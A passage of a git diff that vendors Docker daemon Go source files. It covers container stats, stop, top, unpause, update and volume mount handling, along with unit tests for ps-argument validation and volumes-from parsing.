"github.com/docker/docker/pkg/system" + "github.com/opencontainers/runc/libcontainer/system" +) + +// platformNewStatsCollector performs platform specific initialisation of the +// statsCollector structure. +func platformNewStatsCollector(s *statsCollector) { + s.clockTicksPerSecond = uint64(system.GetClockTicks()) + meminfo, err := sysinfo.ReadMemInfo() + if err == nil && meminfo.MemTotal > 0 { + s.machineMemory = uint64(meminfo.MemTotal) + } +} + +const nanoSecondsPerSecond = 1e9 + +// getSystemCPUUsage returns the host system's cpu usage in +// nanoseconds. An error is returned if the format of the underlying +// file does not match. +// +// Uses /proc/stat defined by POSIX. Looks for the cpu +// statistics line and then sums up the first seven fields +// provided. See `man 5 proc` for details on specific field +// information. +func (s *statsCollector) getSystemCPUUsage() (uint64, error) { + var line string + f, err := os.Open("/proc/stat") + if err != nil { + return 0, err + } + defer func() { + s.bufReader.Reset(nil) + f.Close() + }() + s.bufReader.Reset(f) + err = nil + for err == nil { + line, err = s.bufReader.ReadString('\n') + if err != nil { + break + } + parts := strings.Fields(line) + switch parts[0] { + case "cpu": + if len(parts) < 8 { + return 0, fmt.Errorf("invalid number of cpu fields") + } + var totalClockTicks uint64 + for _, i := range parts[1:8] { + v, err := strconv.ParseUint(i, 10, 64) + if err != nil { + return 0, fmt.Errorf("Unable to convert value %s to int: %s", i, err) + } + totalClockTicks += v + } + return (totalClockTicks * nanoSecondsPerSecond) / + s.clockTicksPerSecond, nil + } + } + return 0, fmt.Errorf("invalid stat format. Error trying to parse the '/proc/stat' file") +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go new file mode 100644 index 0000000000..41731b9c14 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go @@ -0,0 +1,15 @@ +// +build windows + +package daemon + +// platformNewStatsCollector performs platform specific initialisation of the +// statsCollector structure. This is a no-op on Windows. +func platformNewStatsCollector(s *statsCollector) { +} + +// getSystemCPUUsage returns the host system's cpu usage in +// nanoseconds. An error is returned if the format of the underlying +// file does not match. This is a no-op on Windows. +func (s *statsCollector) getSystemCPUUsage() (uint64, error) { + return 0, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_unix.go b/vendor/github.com/docker/docker/daemon/stats_unix.go new file mode 100644 index 0000000000..d875607b3a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_unix.go @@ -0,0 +1,58 @@ +// +build !windows + +package daemon + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" +) + +// Resolve Network SandboxID in case the container reuse another container's network stack +func (daemon *Daemon) getNetworkSandboxID(c *container.Container) (string, error) { + curr := c + for curr.HostConfig.NetworkMode.IsContainer() { + containerID := curr.HostConfig.NetworkMode.ConnectedContainer() + connected, err := daemon.GetContainer(containerID) + if err != nil { + return "", fmt.Errorf("Could not get container for %s", containerID) + } + curr = connected + } + return curr.NetworkSettings.SandboxID, nil +} + +func (daemon *Daemon) getNetworkStats(c *container.Container) (map[string]types.NetworkStats, error) { + sandboxID, err := daemon.getNetworkSandboxID(c) + if err != nil { + return nil, err + } + + sb, err := daemon.netController.SandboxByID(sandboxID) + if err != nil { + return nil, err + } + + lnstats, err := sb.Statistics() + if err != nil { + return nil, err + } + + stats := make(map[string]types.NetworkStats) + // Convert libnetwork nw stats into api stats + for ifName, ifStats := range lnstats { + stats[ifName] = types.NetworkStats{ + RxBytes: ifStats.RxBytes, + RxPackets: ifStats.RxPackets, + RxErrors: ifStats.RxErrors, + RxDropped: ifStats.RxDropped, + TxBytes: ifStats.TxBytes, + TxPackets: ifStats.TxPackets, + TxErrors: ifStats.TxErrors, + TxDropped: ifStats.TxDropped, + } + } + + return stats, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_windows.go b/vendor/github.com/docker/docker/daemon/stats_windows.go new file mode 100644 index 0000000000..f8e6f6f84a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_windows.go @@ -0,0 +1,11 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" +) + +// Windows network stats are obtained directly through HCS, hence this is a no-op. +func (daemon *Daemon) getNetworkStats(c *container.Container) (map[string]types.NetworkStats, error) { + return make(map[string]types.NetworkStats), nil +} diff --git a/vendor/github.com/docker/docker/daemon/stop.go b/vendor/github.com/docker/docker/daemon/stop.go new file mode 100644 index 0000000000..aa7b3820c8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stop.go @@ -0,0 +1,83 @@ +package daemon + +import ( + "fmt" + "net/http" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/container" +) + +// ContainerStop looks for the given container and terminates it, +// waiting the given number of seconds before forcefully killing the +// container. If a negative number of seconds is given, ContainerStop +// will wait for a graceful termination. An error is returned if the +// container is not found, is already stopped, or if there is a +// problem stopping the container. +func (daemon *Daemon) ContainerStop(name string, seconds *int) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + if !container.IsRunning() { + err := fmt.Errorf("Container %s is already stopped", name) + return errors.NewErrorWithStatusCode(err, http.StatusNotModified) + } + if seconds == nil { + stopTimeout := container.StopTimeout() + seconds = &stopTimeout + } + if err := daemon.containerStop(container, *seconds); err != nil { + return fmt.Errorf("Cannot stop container %s: %v", name, err) + } + return nil +} + +// containerStop halts a container by sending a stop signal, waiting for the given +// duration in seconds, and then calling SIGKILL and waiting for the +// process to exit. If a negative duration is given, Stop will wait +// for the initial signal forever. If the container is not running Stop returns +// immediately. +func (daemon *Daemon) containerStop(container *container.Container, seconds int) error { + if !container.IsRunning() { + return nil + } + + daemon.stopHealthchecks(container) + + stopSignal := container.StopSignal() + // 1. Send a stop signal + if err := daemon.killPossiblyDeadProcess(container, stopSignal); err != nil { + // While normally we might "return err" here we're not going to + // because if we can't stop the container by this point then + // its probably because its already stopped. Meaning, between + // the time of the IsRunning() call above and now it stopped. + // Also, since the err return will be environment specific we can't + // look for any particular (common) error that would indicate + // that the process is already dead vs something else going wrong. + // So, instead we'll give it up to 2 more seconds to complete and if + // by that time the container is still running, then the error + // we got is probably valid and so we force kill it. + if _, err := container.WaitStop(2 * time.Second); err != nil { + logrus.Infof("Container failed to stop after sending signal %d to the process, force killing", stopSignal) + if err := daemon.killPossiblyDeadProcess(container, 9); err != nil { + return err + } + } + } + + // 2. Wait for the process to exit on its own + if _, err := container.WaitStop(time.Duration(seconds) * time.Second); err != nil { + logrus.Infof("Container %v failed to exit within %d seconds of signal %d - using the force", container.ID, seconds, stopSignal) + // 3. If it doesn't, then send SIGKILL + if err := daemon.Kill(container); err != nil { + container.WaitStop(-1 * time.Second) + logrus.Warn(err) // Don't return error because we only care that container is stopped, not what function stopped it + } + } + + daemon.LogContainerEvent(container, "stop") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/top_unix.go b/vendor/github.com/docker/docker/daemon/top_unix.go new file mode 100644 index 0000000000..7fb81d0148 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/top_unix.go @@ -0,0 +1,126 @@ +//+build !windows + +package daemon + +import ( + "fmt" + "os/exec" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/api/types" +) + +func validatePSArgs(psArgs string) error { + // NOTE: \\s does not detect unicode whitespaces. + // So we use fieldsASCII instead of strings.Fields in parsePSOutput. + // See https://github.com/docker/docker/pull/24358 + re := regexp.MustCompile("\\s+([^\\s]*)=\\s*(PID[^\\s]*)") + for _, group := range re.FindAllStringSubmatch(psArgs, -1) { + if len(group) >= 3 { + k := group[1] + v := group[2] + if k != "pid" { + return fmt.Errorf("specifying \"%s=%s\" is not allowed", k, v) + } + } + } + return nil +} + +// fieldsASCII is similar to strings.Fields but only allows ASCII whitespaces +func fieldsASCII(s string) []string { + fn := func(r rune) bool { + switch r { + case '\t', '\n', '\f', '\r', ' ': + return true + } + return false + } + return strings.FieldsFunc(s, fn) +} + +func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, error) { + procList := &types.ContainerProcessList{} + + lines := strings.Split(string(output), "\n") + procList.Titles = fieldsASCII(lines[0]) + + pidIndex := -1 + for i, name := range procList.Titles { + if name == "PID" { + pidIndex = i + } + } + if pidIndex == -1 { + return nil, fmt.Errorf("Couldn't find PID field in ps output") + } + + // loop through the output and extract the PID from each line + for _, line := range lines[1:] { + if len(line) == 0 { + continue + } + fields := fieldsASCII(line) + p, err := strconv.Atoi(fields[pidIndex]) + if err != nil { + return nil, fmt.Errorf("Unexpected pid '%s': %s", fields[pidIndex], err) + } + + for _, pid := range pids { + if pid == p { + // Make sure number of fields equals number of header titles + // merging "overhanging" fields + process := fields[:len(procList.Titles)-1] + process = append(process, strings.Join(fields[len(procList.Titles)-1:], " ")) + procList.Processes = append(procList.Processes, process) + } + } + } + return procList, nil +} + +// ContainerTop lists the processes running inside of the given +// container by calling ps with the given args, or with the flags +// "-ef" if no args are given. An error is returned if the container +// is not found, or is not running, or if there are any problems +// running ps, or parsing the output. +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { + if psArgs == "" { + psArgs = "-ef" + } + + if err := validatePSArgs(psArgs); err != nil { + return nil, err + } + + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + if !container.IsRunning() { + return nil, errNotRunning{container.ID} + } + + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + + pids, err := daemon.containerd.GetPidsForContainer(container.ID) + if err != nil { + return nil, err + } + + output, err := exec.Command("ps", strings.Split(psArgs, " ")...).Output() + if err != nil { + return nil, fmt.Errorf("Error running ps: %v", err) + } + procList, err := parsePSOutput(output, pids) + if err != nil { + return nil, err + } + daemon.LogContainerEvent(container, "top") + return procList, nil +} diff --git a/vendor/github.com/docker/docker/daemon/top_unix_test.go b/vendor/github.com/docker/docker/daemon/top_unix_test.go new file mode 100644 index 0000000000..269ab6e947 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/top_unix_test.go @@ -0,0 +1,76 @@ +//+build !windows + +package daemon + +import ( + "testing" +) + +func TestContainerTopValidatePSArgs(t *testing.T) { + tests := map[string]bool{ + "ae -o uid=PID": true, + "ae -o \"uid= PID\"": true, // ascii space (0x20) + "ae -o \"uid= PID\"": false, // unicode space (U+2003, 0xe2 0x80 0x83) + "ae o uid=PID": true, + "aeo uid=PID": true, + "ae -O uid=PID": true, + "ae -o pid=PID2 -o uid=PID": true, + "ae -o pid=PID": false, + "ae -o pid=PID -o uid=PIDX": true, // FIXME: we do not need to prohibit this + "aeo pid=PID": false, + "ae": false, + "": false, + } + for psArgs, errExpected := range tests { + err := validatePSArgs(psArgs) + t.Logf("tested %q, got err=%v", psArgs, err) + if errExpected && err == nil { + t.Fatalf("expected error, got %v (%q)", err, psArgs) + } + if !errExpected && err != nil { + t.Fatalf("expected nil, got %v (%q)", err, psArgs) + } + } +} + +func TestContainerTopParsePSOutput(t *testing.T) { + tests := []struct { + output []byte + pids []int + errExpected bool + }{ + {[]byte(` PID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, false}, + {[]byte(` UID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, true}, + // unicode space (U+2003, 0xe2 0x80 0x83) + {[]byte(` PID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, true}, + // the first space is U+2003, the second one is ascii. + {[]byte(` PID COMMAND + 42 foo + 43 bar + 100 baz +`), []int{42, 43}, true}, + } + + for _, f := range tests { + _, err := parsePSOutput(f.output, f.pids) + t.Logf("tested %q, got err=%v", string(f.output), err) + if f.errExpected && err == nil { + t.Fatalf("expected error, got %v (%q)", err, string(f.output)) + } + if !f.errExpected && err != nil { + t.Fatalf("expected nil, got %v (%q)", err, string(f.output)) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/top_windows.go b/vendor/github.com/docker/docker/daemon/top_windows.go new file mode 100644 index 0000000000..3dd8ead468 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/top_windows.go @@ -0,0 +1,53 @@ +package daemon + +import ( + "errors" + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/go-units" +) + +// ContainerTop handles `docker top` client requests. +// Future considerations: +// -- Windows users are far more familiar with CPU% total. +// Further, users on Windows rarely see user/kernel CPU stats split. +// The kernel returns everything in terms of 100ns. To obtain +// CPU%, we could do something like docker stats does which takes two +// samples, subtract the difference and do the maths. Unfortunately this +// would slow the stat call down and require two kernel calls. So instead, +// we do something similar to linux and display the CPU as combined HH:MM:SS.mmm. +// -- Perhaps we could add an argument to display "raw" stats +// -- "Memory" is an extremely overloaded term in Windows. Hence we do what +// task manager does and use the private working set as the memory counter. +// We could return more info for those who really understand how memory +// management works in Windows if we introduced a "raw" stats (above). +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { + // It's not at all an equivalent to linux 'ps' on Windows + if psArgs != "" { + return nil, errors.New("Windows does not support arguments to top") + } + + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + s, err := daemon.containerd.Summary(container.ID) + if err != nil { + return nil, err + } + procList := &types.ContainerProcessList{} + procList.Titles = []string{"Name", "PID", "CPU", "Private Working Set"} + + for _, j := range s { + d := time.Duration((j.KernelTime100ns + j.UserTime100ns) * 100) // Combined time in nanoseconds + procList.Processes = append(procList.Processes, []string{ + j.ImageName, + fmt.Sprint(j.ProcessId), + fmt.Sprintf("%02d:%02d:%02d.%03d", int(d.Hours()), int(d.Minutes())%60, int(d.Seconds())%60, int(d.Nanoseconds()/1000000)%1000), + units.HumanSize(float64(j.MemoryWorkingSetPrivateBytes))}) + } + return procList, nil +} diff --git a/vendor/github.com/docker/docker/daemon/unpause.go b/vendor/github.com/docker/docker/daemon/unpause.go new file mode 100644 index 0000000000..e66b3868dc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/unpause.go @@ -0,0 +1,38 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" +) + +// ContainerUnpause unpauses a container +func (daemon *Daemon) ContainerUnpause(name string) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if err := daemon.containerUnpause(container); err != nil { + return err + } + + return nil +} + +// containerUnpause resumes the container execution after the container is paused. +func (daemon *Daemon) containerUnpause(container *container.Container) error { + container.Lock() + defer container.Unlock() + + // We cannot unpause the container which is not paused + if !container.Paused { + return fmt.Errorf("Container %s is not paused", container.ID) + } + + if err := daemon.containerd.Resume(container.ID); err != nil { + return fmt.Errorf("Cannot unpause container %s: %s", container.ID, err) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/update.go b/vendor/github.com/docker/docker/daemon/update.go new file mode 100644 index 0000000000..6e26eeb96a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update.go @@ -0,0 +1,92 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/api/types/container" +) + +// ContainerUpdate updates configuration of the container +func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error) { + var warnings []string + + warnings, err := daemon.verifyContainerSettings(hostConfig, nil, true) + if err != nil { + return container.ContainerUpdateOKBody{Warnings: warnings}, err + } + + if err := daemon.update(name, hostConfig); err != nil { + return container.ContainerUpdateOKBody{Warnings: warnings}, err + } + + return container.ContainerUpdateOKBody{Warnings: warnings}, nil +} + +// ContainerUpdateCmdOnBuild updates Path and Args for the container with ID cID. +func (daemon *Daemon) ContainerUpdateCmdOnBuild(cID string, cmd []string) error { + if len(cmd) == 0 { + return nil + } + c, err := daemon.GetContainer(cID) + if err != nil { + return err + } + c.Path = cmd[0] + c.Args = cmd[1:] + return nil +} + +func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) error { + if hostConfig == nil { + return nil + } + + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + restoreConfig := false + backupHostConfig := *container.HostConfig + defer func() { + if restoreConfig { + container.Lock() + container.HostConfig = &backupHostConfig + container.ToDisk() + container.Unlock() + } + }() + + if container.RemovalInProgress || container.Dead { + return errCannotUpdate(container.ID, fmt.Errorf("Container is marked for removal and cannot be \"update\".")) + } + + if err := container.UpdateContainer(hostConfig); err != nil { + restoreConfig = true + return errCannotUpdate(container.ID, err) + } + + // if Restart Policy changed, we need to update container monitor + if hostConfig.RestartPolicy.Name != "" { + container.UpdateMonitor(hostConfig.RestartPolicy) + } + + // If container is not running, update hostConfig struct is enough, + // resources will be updated when the container is started again. + // If container is running (including paused), we need to update configs + // to the real world. + if container.IsRunning() && !container.IsRestarting() { + if err := daemon.containerd.UpdateResources(container.ID, toContainerdResources(hostConfig.Resources)); err != nil { + restoreConfig = true + return errCannotUpdate(container.ID, err) + } + } + + daemon.LogContainerEvent(container, "update") + + return nil +} + +func errCannotUpdate(containerID string, err error) error { + return fmt.Errorf("Cannot update container %s: %v", containerID, err) +} diff --git a/vendor/github.com/docker/docker/daemon/update_linux.go b/vendor/github.com/docker/docker/daemon/update_linux.go new file mode 100644 index 0000000000..f422325272 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update_linux.go @@ -0,0 +1,25 @@ +// +build linux + +package daemon + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/libcontainerd" +) + +func toContainerdResources(resources container.Resources) libcontainerd.Resources { + var r libcontainerd.Resources + r.BlkioWeight = uint64(resources.BlkioWeight) + r.CpuShares = uint64(resources.CPUShares) + r.CpuPeriod = uint64(resources.CPUPeriod) + r.CpuQuota = uint64(resources.CPUQuota) + r.CpusetCpus = resources.CpusetCpus + r.CpusetMems = resources.CpusetMems + r.MemoryLimit = uint64(resources.Memory) + if resources.MemorySwap > 0 { + r.MemorySwap = uint64(resources.MemorySwap) + } + r.MemoryReservation = uint64(resources.MemoryReservation) + r.KernelMemoryLimit = uint64(resources.KernelMemory) + return r +} diff --git a/vendor/github.com/docker/docker/daemon/update_solaris.go b/vendor/github.com/docker/docker/daemon/update_solaris.go new file mode 100644 index 0000000000..f3b545c5f0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update_solaris.go @@ -0,0 +1,11 @@ +package daemon + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/libcontainerd" +) + +func toContainerdResources(resources container.Resources) libcontainerd.Resources { + var r libcontainerd.Resources + return r +} diff --git a/vendor/github.com/docker/docker/daemon/update_windows.go b/vendor/github.com/docker/docker/daemon/update_windows.go new file mode 100644 index 0000000000..01466260bb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/update_windows.go @@ -0,0 +1,13 @@ +// +build windows + +package daemon + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/libcontainerd" +) + +func toContainerdResources(resources container.Resources) libcontainerd.Resources { + var r libcontainerd.Resources + return r +} diff --git a/vendor/github.com/docker/docker/daemon/volumes.go b/vendor/github.com/docker/docker/daemon/volumes.go new file mode 100644 index 0000000000..10cf787709 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes.go @@ -0,0 +1,303 @@ +package daemon + +import ( + "errors" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + dockererrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/container" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + // ErrVolumeReadonly is used to signal an error when trying to copy data into + // a volume mount that is not writable. + ErrVolumeReadonly = errors.New("mounted volume is marked read-only") +) + +type mounts []container.Mount + +// volumeToAPIType converts a volume.Volume to the type used by the Engine API +func volumeToAPIType(v volume.Volume) *types.Volume { + tv := &types.Volume{ + Name: v.Name(), + Driver: v.DriverName(), + } + if v, ok := v.(volume.DetailedVolume); ok { + tv.Labels = v.Labels() + tv.Options = v.Options() + tv.Scope = v.Scope() + } + + return tv +} + +// Len returns the number of mounts. Used in sorting. +func (m mounts) Len() int { + return len(m) +} + +// Less returns true if the number of parts (a/b/c would be 3 parts) in the +// mount indexed by parameter 1 is less than that of the mount indexed by +// parameter 2. Used in sorting. +func (m mounts) Less(i, j int) bool { + return m.parts(i) < m.parts(j) +} + +// Swap swaps two items in an array of mounts. Used in sorting +func (m mounts) Swap(i, j int) { + m[i], m[j] = m[j], m[i] +} + +// parts returns the number of parts in the destination of a mount. Used in sorting. +func (m mounts) parts(i int) int { + return strings.Count(filepath.Clean(m[i].Destination), string(os.PathSeparator)) +} + +// registerMountPoints initializes the container mount points with the configured volumes and bind mounts. +// It follows the next sequence to decide what to mount in each final destination: +// +// 1. Select the previously configured mount points for the containers, if any. +// 2. Select the volumes mounted from another containers. Overrides previously configured mount point destination. +// 3. Select the bind mounts set by the client. Overrides previously configured mount point destinations. +// 4. Cleanup old volumes that are about to be reassigned. +func (daemon *Daemon) registerMountPoints(container *container.Container, hostConfig *containertypes.HostConfig) (retErr error) { + binds := map[string]bool{} + mountPoints := map[string]*volume.MountPoint{} + defer func() { + // clean up the container mountpoints once return with error + if retErr != nil { + for _, m := range mountPoints { + if m.Volume == nil { + continue + } + daemon.volumes.Dereference(m.Volume, container.ID) + } + } + }() + + // 1. Read already configured mount points. + for destination, point := range container.MountPoints { + mountPoints[destination] = point + } + + // 2. Read volumes from other containers. + for _, v := range hostConfig.VolumesFrom { + containerID, mode, err := volume.ParseVolumesFrom(v) + if err != nil { + return err + } + + c, err := daemon.GetContainer(containerID) + if err != nil { + return err + } + + for _, m := range c.MountPoints { + cp := &volume.MountPoint{ + Name: m.Name, + Source: m.Source, + RW: m.RW && volume.ReadWrite(mode), + Driver: m.Driver, + Destination: m.Destination, + Propagation: m.Propagation, + Spec: m.Spec, + CopyData: false, + } + + if len(cp.Source) == 0 { + v, err := daemon.volumes.GetWithRef(cp.Name, cp.Driver, container.ID) + if err != nil { + return err + } + cp.Volume = v + } + + mountPoints[cp.Destination] = cp + } + } + + // 3. Read bind mounts + for _, b := range hostConfig.Binds { + bind, err := volume.ParseMountRaw(b, hostConfig.VolumeDriver) + if err != nil { + return err + } + + // #10618 + _, tmpfsExists := hostConfig.Tmpfs[bind.Destination] + if binds[bind.Destination] || tmpfsExists { + return fmt.Errorf("Duplicate mount point '%s'", bind.Destination) + } + + if bind.Type == mounttypes.TypeVolume { + // create the volume + v, err := daemon.volumes.CreateWithRef(bind.Name, bind.Driver, container.ID, nil, nil) + if err != nil { + return err + } + bind.Volume = v + bind.Source = v.Path() + // bind.Name is an already existing volume, we need to use that here + bind.Driver = v.DriverName() + if bind.Driver == volume.DefaultDriverName { + setBindModeIfNull(bind) + } + } + + binds[bind.Destination] = true + mountPoints[bind.Destination] = bind + } + + for _, cfg := range hostConfig.Mounts { + mp, err := volume.ParseMountSpec(cfg) + if err != nil { + return dockererrors.NewBadRequestError(err) + } + + if binds[mp.Destination] { + return fmt.Errorf("Duplicate mount point '%s'", cfg.Target) + } + + if mp.Type == mounttypes.TypeVolume { + var v volume.Volume + if cfg.VolumeOptions != nil { + var driverOpts map[string]string + if cfg.VolumeOptions.DriverConfig != nil { + driverOpts = cfg.VolumeOptions.DriverConfig.Options + } + v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, driverOpts, cfg.VolumeOptions.Labels) + } else { + v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, nil, nil) + } + if err != nil { + return err + } + + if err := label.Relabel(mp.Source, container.MountLabel, false); err != nil { + return err + } + mp.Volume = v + mp.Name = v.Name() + mp.Driver = v.DriverName() + + // only use the cached path here since getting the path is not necessary right now and calling `Path()` may be slow + if cv, ok := v.(interface { + CachedPath() string + }); ok { + mp.Source = cv.CachedPath() + } + } + + binds[mp.Destination] = true + mountPoints[mp.Destination] = mp + } + + container.Lock() + + // 4. Cleanup old volumes that are about to be reassigned. + for _, m := range mountPoints { + if m.BackwardsCompatible() { + if mp, exists := container.MountPoints[m.Destination]; exists && mp.Volume != nil { + daemon.volumes.Dereference(mp.Volume, container.ID) + } + } + } + container.MountPoints = mountPoints + + container.Unlock() + + return nil +} + +// lazyInitializeVolume initializes a mountpoint's volume if needed. +// This happens after a daemon restart. +func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volume.MountPoint) error { + if len(m.Driver) > 0 && m.Volume == nil { + v, err := daemon.volumes.GetWithRef(m.Name, m.Driver, containerID) + if err != nil { + return err + } + m.Volume = v + } + return nil +} + +func backportMountSpec(container *container.Container) error { + for target, m := range container.MountPoints { + if m.Spec.Type != "" { + // if type is set on even one mount, no need to migrate + return nil + } + if m.Name != "" { + m.Type = mounttypes.TypeVolume + m.Spec.Type = mounttypes.TypeVolume + + // make sure this is not an anyonmous volume before setting the spec source + if _, exists := container.Config.Volumes[target]; !exists { + m.Spec.Source = m.Name + } + if container.HostConfig.VolumeDriver != "" { + m.Spec.VolumeOptions = &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{Name: container.HostConfig.VolumeDriver}, + } + } + if strings.Contains(m.Mode, "nocopy") { + if m.Spec.VolumeOptions == nil { + m.Spec.VolumeOptions = &mounttypes.VolumeOptions{} + } + m.Spec.VolumeOptions.NoCopy = true + } + } else { + m.Type = mounttypes.TypeBind + m.Spec.Type = mounttypes.TypeBind + m.Spec.Source = m.Source + if m.Propagation != "" { + m.Spec.BindOptions = &mounttypes.BindOptions{ + Propagation: m.Propagation, + } + } + } + + m.Spec.Target = m.Destination + if !m.RW { + m.Spec.ReadOnly = true + } + } + return container.ToDiskLocking() +} + +func (daemon *Daemon) traverseLocalVolumes(fn func(volume.Volume) error) error { + localVolumeDriver, err := volumedrivers.GetDriver(volume.DefaultDriverName) + if err != nil { + return fmt.Errorf("can't retrieve local volume driver: %v", err) + } + vols, err := localVolumeDriver.List() + if err != nil { + return fmt.Errorf("can't retrieve local volumes: %v", err) + } + + for _, v := range vols { + name := v.Name() + _, err := daemon.volumes.Get(name) + if err != nil { + logrus.Warnf("failed to retrieve volume %s from store: %v", name, err) + } + + err = fn(v) + if err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go new file mode 100644 index 0000000000..450d17f978 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go @@ -0,0 +1,39 @@ +package daemon + +import ( + "testing" + + "github.com/docker/docker/volume" +) + +func TestParseVolumesFrom(t *testing.T) { + cases := []struct { + spec string + expID string + expMode string + fail bool + }{ + {"", "", "", true}, + {"foobar", "foobar", "rw", false}, + {"foobar:rw", "foobar", "rw", false}, + {"foobar:ro", "foobar", "ro", false}, + {"foobar:baz", "", "", true}, + } + + for _, c := range cases { + id, mode, err := volume.ParseVolumesFrom(c.spec) + if c.fail { + if err == nil { + t.Fatalf("Expected error, was nil, for spec %s\n", c.spec) + } + continue + } + + if id != c.expID { + t.Fatalf("Expected id %s, was %s, for spec %s\n", c.expID, id, c.spec) + } + if mode != c.expMode { + t.Fatalf("Expected mode %s, was %s for spec %s\n", c.expMode, mode, c.spec) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix.go b/vendor/github.com/docker/docker/daemon/volumes_unix.go new file mode 100644 index 0000000000..29dffa9ea0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_unix.go @@ -0,0 +1,219 @@ +// +build !windows + +// TODO(amitkris): We need to split this file for solaris. + +package daemon + +import ( + "encoding/json" + "os" + "path/filepath" + "sort" + "strconv" + "strings" + + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/pkg/errors" +) + +// setupMounts iterates through each of the mount points for a container and +// calls Setup() on each. It also looks to see if is a network mount such as +// /etc/resolv.conf, and if it is not, appends it to the array of mounts. +func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) { + var mounts []container.Mount + // TODO: tmpfs mounts should be part of Mountpoints + tmpfsMounts := make(map[string]bool) + tmpfsMountInfo, err := c.TmpfsMounts() + if err != nil { + return nil, err + } + for _, m := range tmpfsMountInfo { + tmpfsMounts[m.Destination] = true + } + for _, m := range c.MountPoints { + if tmpfsMounts[m.Destination] { + continue + } + if err := daemon.lazyInitializeVolume(c.ID, m); err != nil { + return nil, err + } + rootUID, rootGID := daemon.GetRemappedUIDGID() + path, err := m.Setup(c.MountLabel, rootUID, rootGID) + if err != nil { + return nil, err + } + if !c.TrySetNetworkMount(m.Destination, path) { + mnt := container.Mount{ + Source: path, + Destination: m.Destination, + Writable: m.RW, + Propagation: string(m.Propagation), + } + if m.Volume != nil { + attributes := map[string]string{ + "driver": m.Volume.DriverName(), + "container": c.ID, + "destination": m.Destination, + "read/write": strconv.FormatBool(m.RW), + "propagation": string(m.Propagation), + } + daemon.LogVolumeEvent(m.Volume.Name(), "mount", attributes) + } + mounts = append(mounts, mnt) + } + } + + mounts = sortMounts(mounts) + netMounts := c.NetworkMounts() + // if we are going to mount any of the network files from container + // metadata, the ownership must be set properly for potential container + // remapped root (user namespaces) + rootUID, rootGID := daemon.GetRemappedUIDGID() + for _, mount := range netMounts { + if err := os.Chown(mount.Source, rootUID, rootGID); err != nil { + return nil, err + } + } + return append(mounts, netMounts...), nil +} + +// sortMounts sorts an array of mounts in lexicographic order. This ensure that +// when mounting, the mounts don't shadow other mounts. For example, if mounting +// /etc and /etc/resolv.conf, /etc/resolv.conf must not be mounted first. +func sortMounts(m []container.Mount) []container.Mount { + sort.Sort(mounts(m)) + return m +} + +// setBindModeIfNull is platform specific processing to ensure the +// shared mode is set to 'z' if it is null. This is called in the case +// of processing a named volume and not a 